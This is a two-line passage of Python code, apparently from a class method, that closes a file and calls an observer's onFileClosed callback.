            self.file.close()
            self.observer.onFileClosed(self)